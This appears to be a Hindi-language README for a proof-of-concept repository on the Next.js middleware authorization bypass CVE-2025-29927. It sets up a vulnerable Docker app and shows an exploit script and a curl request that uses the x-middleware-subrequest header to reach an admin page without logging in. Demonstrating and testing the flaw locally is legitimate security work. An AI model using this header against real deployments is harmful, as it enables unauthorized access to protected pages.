
Next.js मिडलवेयर भेद्यता (CVE-2025-29927) पर शोध जो प्राधिकरण बाईपास और संभावित शोषण की अनुमति देता है।
यह रिपॉजिटरी Next.js मिडलवेयर में एक महत्वपूर्ण भेद्यता (CVE-2025-29927) का प्रदर्शन करती है, जो संस्करण 11.1.4 से 15.1.7 तक प्रभावित करती है। यह भेद्यता प्राधिकरण बाईपास, CSP बाईपास, और कैश-पॉइज़निंग के माध्यम से संभावित DoS हमलों की अनुमति देती है। समस्या x-middleware-subrequest हेडर के प्रबंधन के तरीके से उत्पन्न होती है, जिससे हमलावर मिडलवेयर सुरक्षा तंत्र को बायपास कर सकते हैं।
यह प्रूफ ऑफ कॉन्सेप्ट v12 में भेद्यता के लिए विशिष्ट है।
डॉकर और इस रिपो से फ़ाइलों का उपयोग करके कमजोर वातावरण सेटअप करें, निम्नलिखित चलाकर:
git clone https://github.com/l1uk/nextjs-middleware-exploit.git
cd nextjs-middleware-exploit
docker build -t my-next-app .
docker run -p 3000:3000 my-next-app
इस रिपॉजिटरी में भेद्यता के शोषण का परीक्षण करने के लिए पहले से बनाई गई exploit.sh स्क्रिप्ट है। इसका परीक्षण करने के लिए चलाएँ:
chmod +x exploit.sh
./exploit.sh
इसके अतिरिक्त आप निम्नलिखित प्रयास करके भेद्यता के शोषण का परीक्षण कर सकते हैं:
लॉगिन पेज पर रीडायरेक्ट किया जाना चाहिए।curl -i http://localhost:3000/admin
x-middleware-subrequest हेडर का उपयोग करके पेज का अनुरोध करें। आप प्रमाणीकरण पेज को बायपास करने में सक्षम होना चाहिए।curl -i -H "x-middleware-subrequest: pages/_middleware" http://localhost:3000/admin